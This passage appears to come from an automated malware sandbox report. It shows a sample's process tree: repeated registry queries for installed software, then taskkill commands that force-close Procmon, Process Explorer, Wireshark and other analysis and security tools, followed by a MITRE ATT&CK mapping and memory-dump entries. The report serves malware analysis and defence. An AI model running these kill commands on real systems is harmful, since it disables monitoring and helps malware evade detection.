    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4296
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:2108
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:3168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:2744
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4568
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4972
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:5068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:2132
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4208
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:5100
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2068
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4636
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:5016
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:2524
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4620
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4976
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2984
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2068
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2516
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4568
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4568
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4960

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3692-97-0x00000246743B0000-0x00000246743B1000-memory.dmp

Filesize
4KB

Download
memory/3692-101-0x0000024674690000-0x0000024674691000-memory.dmp

Filesize
4KB

Download
memory/3692-90-0x00007FFEADD60000-0x00007FFEAE74C000-memory.dmp

Filesize
9.9MB

Download